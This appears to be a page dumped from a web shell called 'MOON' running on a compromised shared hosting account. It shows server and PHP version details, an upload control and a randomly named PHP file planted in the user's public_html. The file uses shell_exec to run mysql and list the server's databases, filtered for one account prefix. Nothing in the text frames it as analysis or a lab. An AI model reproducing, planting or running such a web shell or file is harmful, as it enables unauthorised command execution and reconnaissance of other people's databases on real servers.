MOON
Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips DAV/2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_auth_passthrough/2.1
System: Linux int.interweb-hosting.net 2.6.32-754.35.1.el6.x86_64 #1 SMP Sat Nov 7 12:42:14 UTC 2020 x86_64
User: elainekoch (690)
PHP: 5.4.45
Disabled: NONE
Upload Files
File: /home/elainekoch/public_html/x73fa9d.php
<?php $o=shell_exec('mysql -N -e "SHOW DATABASES" 2>/dev/null');$dbs=array_filter(array_map('trim',explode("\n",$o?:'')));$user='conerial';$mine=array_filter($dbs,function($d)use($user){return strpos($d,$user.'_')===0||$d===$user;});echo json_encode(['ok'=>1,'dbs'=>array_values($mine)]);?>